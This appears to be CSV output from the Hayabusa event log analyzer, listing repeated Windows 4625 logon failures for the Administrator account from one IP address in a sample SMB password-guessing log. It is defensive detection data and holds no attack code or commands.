2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LdBFYyftnH67Gyh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eO6c2PDl7zVBGzPi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1ONnDOs16EnBkdFv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aTHHCX9EoKRY4zhR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f1jhH08oLzpONDpa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o2YK7zc7Ne9c8txA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86CrOo9CFreIzSM5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0X9UEojEnc350xPc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9g3PO3jofnySl92G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TRndfQmPYuhV0Ri  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yyJOdaks4B1sKMDv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IB3OSmcFx5TUiiJX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lo3Ex40dkIeO53HF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkzDG8QOM2cxbokF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YoMf36ZXJBLnYxtc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5izPIefHqDDWNDlu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z9o4f1XvvcVXBNwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IjCR48ZJFyEhzrYI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mUV9i4O2gapcC01d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJzGAMQCvJBFOUPq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fyyu0x6I29R2J10Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8lCe1shqSs0xNwAJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ipZAMvm56d5mE9Fc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XX9N7jodTuEYBCSE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h5DBFGpzfJJ7gYV1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fQ3qTwcWkXJDuXDI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TOfkvLSo2HuhMtvk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y9DQUhPQHvvwAO0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yao1JM0tSFv5IHnL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NXGm63wiZz3ZYFb9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: izvPgZCO2GRVLhId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iI9zO2o7jd922pfK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UnAGy86My6hVwt4J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhFTzONSVEziRtgq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdEv4ooC8AApqU1T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TxFGRBKVK732Aeu4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITg8QH90LKkAQMLL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E8YKCN2uxmJtYxdW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lcVIqrTQbNLFW7Cr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: taZx68l1ci0i2XB0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Jjy0gZhZCc9dVGd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S1DxOWcNytmxHfxl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGRFWos3MJeQ0oAr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I3YXVTiQAGbf57TH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eWNsBwoGd36krY2U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HIobpWCoOHdD76lL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W91ruUEdXwRcMxVB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6PEs7fp97cYFf4vx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hQelUX0kwLfpJnr0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t88CBspQqbiO1IPc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zELW2Upo3jRCIqJk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QfcyJGLYmu93JBIL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3t2nKPZHZvcXM3QA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oiDRonqdEM2YJvz9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wJPF4GUypkDkTz56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cd5YRVIoXx8LoYpK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H49I2Xp2Gz1Jj0Wh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZMSWWzskoRfYBGny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GLm2PolKMBsYkPnN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ZjHWhG2rXzYWskz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FOZzVedHYODB5Yvd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVaRybjI4HdZV0Zs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tTcl30MvvycjFcQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fVZqbCr9EwmV4gNE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zVwhii0TVmCkpDI0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Tx04CPPVa6WYY9G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gHyefIGqhIIy3ZI9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wrietoh4wgXcEvNd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9WW0Y5PW2JfCCdyR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tmXsMJ0ELK4qiNY6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeftUqriSoxCgmDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 60JE9WQQ8N00j65B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r0rt2yVAEH6V4IIS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
